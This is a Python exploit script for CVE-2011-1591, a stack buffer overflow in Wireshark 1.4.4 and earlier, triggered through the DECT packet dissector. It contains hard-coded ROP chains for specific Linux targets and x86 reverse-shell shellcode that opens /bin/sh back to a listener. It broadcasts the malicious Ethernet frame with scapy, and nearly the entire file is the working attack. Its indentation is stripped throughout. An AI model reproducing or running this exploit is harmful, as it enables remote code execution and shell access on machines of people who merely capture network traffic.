#!/usr/bin/env python
a = """
\n\t-- CVE: 2011-1591 : Wireshark <= 1.4.4 packet-dect.c dissect_dect() --\n
import sys, struct
if sys.version_info >= (2, 5):
from scapy.all import *
else:
from scapy import *
def _x(v):
return struct.pack("<I", v)
arch_rop_chain= [
_x(0x8069acb),
_x(0), _x(0x80e9360), _x(0),
_x(0x8067d90),
_x(0x8081f2e),
_x(0x80f9d7f),
_x(0x8061804),
_x(0xffff0000),
_x(0x80c69f0),
_x(0x80ff067),
_x(0x8077c53),
_x(0x8061804),
_x(0x7f16a5d0),
_x(0x8048360),
_x(0x8089f46),
_x(0x8067d90),
_x(0x8081f2e),
_x(0x8067d92)*7,
_x(0x80745f9),
_x(0),
_x(0x8065226),
_x(0x81aca20-0xc),
_x(0x8074597),
_x(0x8048360),
_x(0x8065226),
_x(0x6fe70),
_x(0x8081f2e),
_x(0x806973d),
_x(0x08104f61),
_x(0x0811eb63),
_x(0),
_x(0x10000),
_x(0x7),
_x(0x8061804),
_x(0xff+0x50),
_x(0x80b8fc8),
_x(0x8067d90),
_x(0x80acc63),
_x(0x8081f2e),
_x(0x0806979e)
]
labs_rop_chain = [
_x(0x08073fa1),
_x(0), _x(0x0808c4d3), _x(0),
_x(0x080e64cf),
_x(0x7), _x(0x0),
_x(0x080a1711),
_x(0x0815b74f),
_x(0xffff0000),
_x(0x0804c73c),
_x(0x080fadd7),
_x(0x0804c73c),
_x(0x080af344),
_x(0x0815b74f),
_x(0x10000),
_x(0x80d8b71),
_x(0x7D),
_x(0x804e6df),
_x(0xffffe411),
_x(0x080ab949),
_x(0x0815b74f),
_x(256),
_x(0x080a1711),
_x(0x081087d3),
_x(0x080f7cb1)
]
addr_os = {
1: ["Arch Linux 2010.05",0xb9, arch_rop_chain],
2: ["Labs test ",0xbf, labs_rop_chain],
-1 : ["Debian 5.0.8 Lenny",-3, False],
-2 : ["Debian 6.0.2 Squeeze",-1, False],
-3 : ["Fedora 14 ",-1, False],
-4 : ["OpenSuse 11.3 ",-1, False],
-5 : ["Ubuntu 10.10 | 11.04",-1, False],
-6 : ["Gentoo *",-2, False]
}
print a
def usage():
print "Please select and ID >= 0 :\n"
print " IDTARGETINFO"
print "--------------------------------------------------------------------"
for i in addr_os.iteritems():
print "%2d-- %s "%(i[0], i[1][0]),
if i[1][1] == -1:
print "Default package uses LibSSP & Fortify Source"
elif i[1][1] == -2:
print "Compiled/Build with Fortify Source"
elif i[1][1] == -3:
print "DECT protocol not supported"
else:
print "VULN -> Stack size %d"%(i[1][1])
sys.exit(1)
if len(sys.argv) == 1:
usage()
elif addr_os.has_key(int(sys.argv[1])) is False:
usage()
elif int(sys.argv[1]) < 0:
usage()
target = addr_os[int(sys.argv[1])]
print "\n[+] Target : %s"%target[0]
rop_chain = "".join([ rop for rop in target[2]])
rev_tcp_shell = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\x7f\x00\x00\x01\x66\x68\x11\x5c\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
SEIP_SMASH = target[1]
print "\t[+] Length for smashing SEIP : 0x%x(%d)"%(SEIP_SMASH, SEIP_SMASH)
nopsled = "\x90"
head_nop = 50
shellcode = nopsled * head_nop + rev_tcp_shell + nopsled * (SEIP_SMASH-len(rev_tcp_shell) - head_nop)
payload = shellcode + rop_chain
if (len(payload) % 2):
diff = len(payload) % 2
payload = payload[(2-diff):]
print "\t[+] Payload length : %d"%len(payload)
evil_packet = Ether(type=0x2323, dst="ff:ff:ff:ff:ff:ff") / payload
print "\t[+] Evil packet length : %d"%len(evil_packet)
print "\t[+] Sending packet to broadcast"
sendp(evil_packet)